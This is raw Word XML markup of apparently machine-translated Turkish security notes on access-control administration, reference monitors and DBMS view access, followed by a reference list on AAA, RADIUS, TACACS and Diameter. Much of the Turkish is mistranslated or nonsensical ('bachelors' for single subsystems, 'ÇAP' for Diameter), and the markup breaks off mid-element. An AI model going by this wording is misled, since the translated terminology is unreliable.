    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alakasız ayrımlardan habersiz kalmak için, yöneticilerin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tutarlı ve tutarlı bir arayüz. Arayüzün ne ile tutarlı olduğu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>idari içeriğe bağlıdır. Yöneticiler birden fazla işlem yaparsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alt sistemlerde, tek bir ürün yöneticilere tek bir ürün sağlayabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Temin ettikleri alt sistemlerin çeşitliliğini gizleyen arayüz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>idari veri. Öte yandan, yöneticiler bekarlarla ilgilenirse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>alt sistemler, alt sistemin kendisi veya alt sisteme özgü bir ürün, yöneticilere idari ve diğer işlemleri yapan bir arayüz sağlayabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onlara sunulan fonksiyonlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İdari yük, eğer her biri varsa, kabul edilebilir sınırlar içinde tutulabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yönetici sadece makul sayıda bireyden sorumludur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve işlevler. İşlevsel dağıtım alt sistemlere veya türlere odaklanabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kaynakların (örneğin medya veya programlar). İşlevsel dağılım ne zaman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yetersiz, ademi merkeziyetçilik çok önemlidir. Merkezi olmayan yönetim ile,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Her yönetici bir veya daha fazla departmandan sorumlu olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>organizasyon. Özetle, erişimin etkin kontrolü,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Politika’nın, maliyet / fayda kısıtlamaları dahilinde, görevlerin ayrılması ve en az ayrıcalık ilkelerinin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onadı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UYGULAMA KONTROLLERİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Korumalı kaynak türüne erişim isteği her zaman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir iş veya oturumda, erişim kontrolü kararı verilmelidir. Bu karar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yöneticilerin kaydettiği şekilde yönetimin isteklerini yerine getirmek zorundadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kararları veren program referans monitör olarak adlandırıldı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çünkü iş veya oturumun korumalı bir kaynağa ve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Karar referansların izlenmesi olarak görülür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Her ne kadar referans monitörü işlevinden ziyade işlevi ile tanımlansa da</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>düzenlemesi, tek bir program olarak düşünmek için uygundur. Her biri için</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nesnenin türü, kaynak yöneticisi adı verilen ve olması gereken bir program var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bu tür her nesneye her erişimde yer alır. Kaynak yöneticisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referans monitörü, her birinin verilip verilmeyeceğini belirleyen bir hakem olarak kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>koruduğu bir türdeki herhangi bir nesneye erişim istekleri kümesi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yanıt veren bir veri tabanı yönetim sisteminde (DBMS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tek bir alan için istekte bulunulduğunda, DBMS’nin görünüm yönetimi rutinleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>referans monitörü. Daha geleneksel olanı, bir görünüme bağlanma durumudur,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D91F7C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DBMS tipik olarak, kullanmak üzere iş veya oturum erişimi verilip verilmeyeceğine karar vermek için harici, çok amaçlı bir referans izleyicisi kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91F7C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>görünüm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3503295" cy="3004185"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="19" name="Resim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3295" cy="3004185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REFERANSLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ISM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> AAA 101: Key Features of an AAA Service:216</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ISM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> RADIUS: Uzaktan Kimlik Doğrulama Çevirmeli Kullanıcı Hizmeti:217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ISM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> AA'yı RADIUS'a Koymak: Doğrulamalar ve Yetkiler:217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Üçüncü A: Eh, Bazen Yine de!:217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: İleri Düşünme ve Diğer Gee-Whiz Yetenekleri:217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Tökezleyen Bloklar, Karmaşıklıklar ve Diğer RADIUS Sınırlamaları:220</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: TACACS: Terminal Erişim Kontrol Geçiş Kontrol Sistemi:220</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM:A 1: TACACS Kimlik Doğrulama:221</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM:A 2: TACACS Yetkilendirmesi:221</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM:A 3: TACACS Muhasebe:221</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Proksilite, Sorunlar ve Tuzaklar:221</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: ÇAP: İki kez RADIUS?:224</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: İki Brute: ÇAPETİ Yetkilendirme Yetkilendirme işlemleri:226</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00160117" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Her Şey için Muhasebe:226</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160117">
        <w:rPr>
